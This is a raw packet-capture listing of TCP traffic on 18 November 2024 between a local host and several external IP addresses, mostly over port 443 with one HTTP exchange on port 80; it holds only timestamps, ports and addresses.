                                                                                                                                                                                            Nov 18, 2024 21:01:15.179507017 CET44349937142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.213663101 CET49906443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:01:15.213699102 CET44349906172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.214771986 CET49939443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:15.214808941 CET44349939204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.214930058 CET49939443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:15.215135098 CET49939443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:15.215151072 CET44349939204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.227492094 CET49937443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363219976 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363296986 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363332033 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363372087 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363420010 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363437891 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363475084 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363485098 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363513947 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.363544941 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.399142981 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.399254084 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.399275064 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.399339914 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.439235926 CET44349937142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482471943 CET49937443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482502937 CET44349937142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482641935 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482692957 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482728958 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482759953 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482785940 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.482808113 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.483320951 CET49937443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:15.483397961 CET44349937142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.483501911 CET49937443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:01:15.496048927 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.496139050 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.496162891 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.496263027 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.529889107 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.529978037 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.529977083 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.530009985 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.530036926 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.530057907 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.530078888 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.530122995 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.548322916 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.548367023 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.548427105 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.548445940 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.548475027 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.548496008 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.556067944 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.556166887 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.556184053 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.556241035 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.919526100 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.919558048 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.919608116 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.919645071 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.919696093 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.919742107 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.919797897 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.926255941 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.926362038 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.926378965 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.926426888 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.944698095 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.944756031 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.944780111 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.944797039 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.944825888 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.944861889 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.951508999 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.951605082 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.951618910 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.951673031 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.970136881 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.970180988 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.970263004 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.970280886 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.970312119 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.970330954 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.976507902 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.976599932 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.976613998 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.976705074 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.994971037 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.995018959 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.995060921 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.995076895 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:15.995109081 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:15.995127916 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.003381014 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.003470898 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.003492117 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.003562927 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.019262075 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.019304991 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.019359112 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.019376040 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.019432068 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.019432068 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.026243925 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.026335001 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.026350021 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.026534081 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.042498112 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.042543888 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.042563915 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.042634010 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.042649031 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.042699099 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.050724983 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.050877094 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.050893068 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.050951958 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.063909054 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.063952923 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.064008951 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.064023018 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.064054012 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.064071894 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.070311069 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.070400000 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.070414066 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.070472956 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.090985060 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.091025114 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.091059923 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.091073990 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.091104984 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.091124058 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.098074913 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.098155022 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.098169088 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.098225117 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.117580891 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.117623091 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.117661953 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.117676020 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.117698908 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.117718935 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.127777100 CET44349938150.171.74.254192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.127851009 CET49938443192.168.2.16150.171.74.254
                                                                                                                                                                                            Nov 18, 2024 21:01:16.131402016 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.131484032 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.131500006 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.131583929 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.139048100 CET44349939204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.139156103 CET49939443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:16.140147924 CET44349939204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.140230894 CET49939443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:16.145422935 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.145492077 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:16.145546913 CET4434993623.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:16.145598888 CET49936443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:17.254220009 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:17.265774965 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:17.265990019 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:17.267827034 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:17.279999971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:17.837449074 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:17.837460041 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:17.837575912 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:18.051007986 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.051414967 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.051454067 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.051508904 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.052644014 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.052681923 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.052716970 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.056521893 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.056587934 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.057266951 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.058463097 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.058501005 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.058541059 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.062206984 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.062246084 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.062277079 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.063463926 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.063529015 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.168788910 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.169199944 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.169322014 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.170447111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.170486927 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.170548916 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.173737049 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.174101114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.174176931 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.175359964 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.175398111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.175457954 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.179399967 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.179456949 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.179519892 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.180569887 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.180607080 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.180668116 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.184338093 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.184375048 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.184408903 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.184447050 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.186374903 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.186409950 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.186435938 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.190177917 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.190215111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.190244913 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.190248013 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.190327883 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.191282034 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.191335917 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.191365004 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.191400051 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.222347021 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.222393036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.222485065 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.268508911 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.285629988 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.286067009 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.286154032 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.287379026 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.287416935 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.287471056 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.289277077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.289313078 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.289375067 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.291623116 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.291660070 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.291721106 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.346115112 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.346550941 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.346767902 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.347739935 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.347796917 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.347965956 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.349836111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.349870920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.349945068 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.352281094 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.352317095 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.352384090 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.354698896 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.354751110 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.354816914 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.357266903 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.357304096 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.357363939 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.359411955 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.359451056 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.359488964 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.359518051 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.361737013 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.361773968 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.361821890 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.364150047 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.364187002 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.364224911 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.366825104 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.366861105 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.367022991 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.369180918 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.369231939 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.369255066 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.369270086 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.369333982 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.371355057 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.371395111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.371459961 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.373245001 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.373281956 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.373344898 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.375540972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.375577927 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.375633955 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.377536058 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.377573013 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.377630949 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.379837990 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.379873991 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.379913092 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.379933119 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.381762028 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.381828070 CET4994080192.168.2.16193.188.22.73
